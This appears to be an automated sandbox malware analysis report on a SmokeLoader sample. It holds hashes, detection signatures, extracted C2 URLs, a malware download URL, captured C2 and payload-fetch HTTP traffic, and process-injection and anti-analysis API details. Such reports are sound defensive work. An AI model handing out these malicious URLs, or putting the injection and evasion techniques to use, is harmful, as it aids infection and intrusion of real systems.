Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name: qhQ6armJ25.exe
Analysis ID: 528745
MD5: 9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1: afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256: 5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags: DofoilexeSmokeLoader
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}
Multi AV Scanner detection for submitted file
Source: qhQ6armJ25.exe Virustotal: Detection: 45% Perma Link
Antivirus detection for URL or domain
Source: http://nalirou70.top/ Avira URL Cloud: Label: phishing
Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: privacytoolzfor-you7000.top Virustotal: Detection: 6% Perma Link
Source: xacokuo80.top Virustotal: Detection: 7% Perma Link
Source: nalirou70.top Virustotal: Detection: 10% Perma Link
Source: http://xacokuo80.top/ Virustotal: Detection: 7% Perma Link
Machine Learning detection for sample
Source: qhQ6armJ25.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\gahfeaj Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D380.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: qhQ6armJ25.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nalirou70.top
Source: C:\Windows\explorer.exe Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe Domain query: xacokuo80.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://nalirou70.top/
Source: Malware configuration extractor URLs: http://xacokuo80.top/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RAPMSB-ASRU RAPMSB-ASRU
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwcurllpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: xacokuo80.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
Source: unknown DNS traffic detected: queries for: nalirou70.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Uses 32bit PE files
Source: qhQ6armJ25.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401813 Sleep,NtTerminateProcess, 1_2_00401813
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401842 Sleep,NtTerminateProcess, 1_2_00401842
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_2_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey, 1_2_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401812 Sleep,NtTerminateProcess, 1_2_00401812
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_2_0040202C
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401830 Sleep,NtTerminateProcess, 1_2_00401830
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401833 Sleep,NtTerminateProcess, 1_2_00401833
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401836 Sleep,NtTerminateProcess, 1_2_00401836
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_004023D9 NtEnumerateKey, 1_2_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_1_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_004023D9 NtEnumerateKey, 1_1_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey, 1_1_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_1_0040202C
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401813 Sleep,NtTerminateProcess, 5_2_00401813
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401842 Sleep,NtTerminateProcess, 5_2_00401842
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 5_2_00402052
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey, 5_2_00402403
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401812 Sleep,NtTerminateProcess, 5_2_00401812
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 5_2_0040202C
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401830 Sleep,NtTerminateProcess, 5_2_00401830
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401833 Sleep,NtTerminateProcess, 5_2_00401833
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401836 Sleep,NtTerminateProcess, 5_2_00401836
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_004023D9 NtEnumerateKey, 5_2_004023D9
PE file contains strange resources
Source: qhQ6armJ25.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qhQ6armJ25.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: qhQ6armJ25.exe Virustotal: Detection: 45%
Source: qhQ6armJ25.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\AppData\Roaming\gahfeaj Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\gahfeaj Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D380.exe Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gahfeaj Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D380.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/3@10/1
Source: qhQ6armJ25.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: qhQ6armJ25.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
